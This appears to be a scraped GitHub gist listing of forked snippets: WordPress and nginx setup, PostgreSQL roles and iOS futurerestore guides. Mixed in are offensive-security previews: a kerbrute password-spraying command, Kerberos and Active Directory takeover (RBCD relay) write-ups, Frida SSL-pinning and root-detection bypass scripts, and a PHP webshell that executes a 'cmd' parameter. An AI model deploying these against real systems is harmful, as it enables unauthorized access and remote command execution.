With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
marcostolosa
/ wp.sh
Created
March 13, 2019 16:16
— forked from bgallagh3r/wp.sh
Wordpress: Bash Install Script -- Downloads latest WP version, updates wp-config with user supplied DB name, username and password, creates and CHMOD's uploads dir, copies all the files into the root dir you run the script from, then deletes itself!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash -e | |
| clear | |
| echo "============================================" | |
| echo "WordPress Install Script" | |
| echo "============================================" | |
| echo "Database Name: " | |
| read -e dbname | |
| echo "Database User: " | |
| read -e dbuser | |
| echo "Database Password: " |
marcostolosa
/ nginx.conf
Last active
April 16, 2019 13:13
— forked from nrollr/nginx.conf
NGINX config for SSL with Let's Encrypt certs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| worker_processes 2; | |
| events { | |
| worker_connections 1024; | |
| } | |
| upstream app { | |
| server 127.0.0.1:5000 fail_timeout=0; | |
| } |
marcostolosa
/ read-access.sql
Created
April 16, 2019 12:51
— forked from oinopion/read-access.sql
How to create read only user in PostgreSQL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- Create a group | |
| CREATE ROLE readaccess; | |
| -- Grant access to existing tables | |
| GRANT USAGE ON SCHEMA public TO readaccess; | |
| GRANT SELECT ON ALL TABLES IN SCHEMA public TO readaccess; | |
| -- Grant access to future tables | |
| ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT SELECT ON TABLES TO readaccess; |
marcostolosa
/ kerberos_attacks_cheatsheet.md
Created
December 11, 2019 18:14
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
marcostolosa
/ Workstation-Takeover.md
Created
January 6, 2022 13:57
— forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
marcostolosa
/ frida-android-repinning.js
Created
January 26, 2022 14:47
— forked from esabook/frida-android-repinning.js
Mirror frida-android-repinning.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Android SSL Re-pinning frida script v0.2 030417-pier | |
| $ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt | |
| $ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause | |
| https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/ | |
| */ | |
| setTimeout(function(){ |
marcostolosa
/ easy-simple-php-webshell.php
Created
February 8, 2022 03:16
— forked from joswr1ght/easy-simple-php-webshell.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
| <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
| <input type="SUBMIT" value="Execute"> | |
| </form> | |
| <pre> | |
| <?php | |
| if(isset($_GET['cmd'])) | |
| { |
marcostolosa
/ root_bypass.js
Created
April 19, 2022 14:46
— forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // $ frida -l antiroot.js -U -f com.example.app --no-pause | |
| // CHANGELOG by Pichaya Morimoto ([email protected]): | |
| // - I added extra whitelisted items to deal with the latest versions | |
| // of RootBeer/Cordova iRoot as of August 6, 2019 | |
| // - The original one just fucked up (kill itself) if Magisk is installed lol | |
| // Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
| // If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
| Java.perform(function() { | |
| var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
Important: Please don't use the comment section to ask for help. Join r/jailbreak (
#genius-bar) or FDR Bureau (#futurerestore-support) instead.
This is a guide for downgrading (or upgrading) to unsigned versions with futurerestore on checkm8 devices (A11 and below). You must have blobs for the version you want to go to, and SEP/BB compatibility may limit how far you can go.
The latest SEP/BB as of right now is iOS 15.4.1.
marcostolosa
/ FuturerestoreGuide.md
Created
July 27, 2022 14:17
— forked from TheRealKeto/FuturerestoreGuide.md
A guide fully covering the process of using Futurerestore to upgrade, downgrade, or re-restore to an unsigned iOS firmware.
Futurerestore is a tool that allows users to upgrade, downgrade, or re-restore their iOS device to an unsigned firmware through the use of SHSH2 blobs. This guide will teach you how to use Futurerestore in order to upgrade, downgrade, or re-restore to an unsigned firmware.
Before continuing, keep in mind that this guide is based off of this one, and contains information that can change your device's behavior or even damage it. With that in mind, please read the guide fully, as no one but YOU will be held responsible for any damage caused to your device.
Throughout the entirety of this guide, keep in mind that:
- iOS 13.1.3's SEP and Baseband are NOT compatible with iOS 12.x for all devices. This means that you're NOT able to upgrade, downgrade, or re-restore A10-A12X devices back to iOS 12.x. Attempting to use an incompatible SEP and Baseband will cause Futureresto
OlderNewer